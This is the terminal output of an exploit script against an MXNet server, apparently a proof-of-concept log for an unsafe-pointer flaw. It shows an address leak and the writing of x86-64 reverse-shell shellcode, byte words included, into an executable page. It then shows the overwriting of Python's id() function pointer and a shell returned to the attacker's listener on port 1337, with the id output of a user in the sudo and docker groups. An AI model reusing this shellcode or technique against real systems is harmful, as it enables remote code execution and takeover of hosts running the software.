$ python3 x.py http://192.168.200.185:5000 192.168.200.186 1337

******** MXNet Unsafe Pointer Usage Exploit ********

[i]    got id 0x7fde61190d10

[+]    derived RWX_ADDR: 0x7ffe3d3ae000

[+]    set RWX_ADDR  += 0x800 (halfway through page): 0x7ffe3d3ae800

[+]    Writing shellcode to 0x7ffe3d3ae800

[w]        w64(0x7ffe3d3ae800, 0x3148ff3148c03148)

[w]        w64(0x7ffe3d3ae808, 0x6ac0314dd23148f6)

[w]        w64(0x7ffe3d3ae810, 0x5a066a5e016a5f02)

[w]        w64(0x7ffe3d3ae818, 0xc08949050f58296a)

[w]        w64(0x7ffe3d3ae820, 0x5241d2314df63148)

[w]        w64(0x7ffe3d3ae828, 0x2444c766022404c6)

[w]        w64(0x7ffe3d3ae830, 0xc0042444c7390502)

[w]        w64(0x7ffe3d3ae838, 0x106ae68948bac8a8)

[w]        w64(0x7ffe3d3ae840, 0xf582a6a5f50415a)

[w]        w64(0x7ffe3d3ae848, 0x485e036af6314805)

[w]        w64(0x7ffe3d3ae850, 0x75050f58216aceff)

[w]        w64(0x7ffe3d3ae858, 0x5a5e5757ff3148f6)

[w]        w64(0x7ffe3d3ae860, 0x2f6e69622f2fbf48)

[w]        w64(0x7ffe3d3ae868, 0x545708efc1486873)

[w]        w64(0x7ffe3d3ae870, 0x50f583b6a5f)

[+]    Shellcode written!

[+]    Deriving address of Python3 builting function id...

[+]    Overwriting id() function pointer with address to shellcode...

[w]        w64(0x7fde61190d40, 0x7ffe3d3ae800)

[^]    Setting up listening shell...

[+] Trying to bind to 192.168.200.186 on port 1337: Done

[+] Waiting for connections on 192.168.200.186:1337: Got connection from 192.168.200.185 on port 57048

[+]    Triggering the exploit!

[------------------------------------------------------------]

[+]    Received a shell!!!

[------------------------------------------------------------]

[*] Switching to interactive mode

uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),999(docker)

user

/home/user

$ id

uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),999(docker)